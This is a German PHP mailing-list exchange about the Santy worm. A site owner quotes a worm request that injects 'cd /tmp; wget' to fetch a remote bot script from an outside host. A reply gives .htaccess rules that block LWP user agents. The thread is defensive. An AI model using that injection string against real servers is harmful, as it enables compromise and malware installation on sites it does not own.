[php] [OT] Santy: Wurm attackiert PHP-Skripte

[Wolfgang Drews]

krass. 

Der war um weihnachten im Umlauf, und jetzt merkst du es???

>        Der grund für die wochenlangen Probleme auf meiner 
>        Website ist anscheinend der Wurm "Santy". Meine 
>        Website bzw. mein gemieteter Server ist seit Wochen 
>        extrem überlastet und langsam.
>        Artikel:
>        http://www.heise.de/newsticker/result.xhtml?url=/newsti
>        cker/meldung/54623&words=Wurm%20attackiert%20PHP%20Skripte
>        
>        Darin kommt dieser code vor:
>        
>        http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;\ 
>        wget www.visualcoders.net/spybot.txt;
>        
>        .. Nur versteh ich nicht ganz was der macht bzw wie 
>        der da was böses machen kann...
>        Kann mir wer von euch erklären wie der Wurm arbeitet 
>        und wie er es schafft meine Website lahmzulegen?


hier, hau sowas in die .htaccess rein, dann sollte es gut sein:
SetEnvIfNoCase User-Agent "^LWP::Simple" bad_bot
SetEnvIfNoCase User-Agent "^lwp-trivial" bad_bot
SetEnvIfNoCase User-Agent "^lwp" bad_bot
SetEnvIfNoCase User-Agent "^LWP" bad_bot

<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>


beste Grüße

-Wolfgang 

--
PHP-Knotenpunkt Dynamic Web Pages: http://www.dynamicwebpages.de/
Deutschsprachige PHP-Zertifizierungen: http://www.phpzertifizierung.de/
Professionelle Lösungen für dynamisches Webpublishing: http://php-buch.de/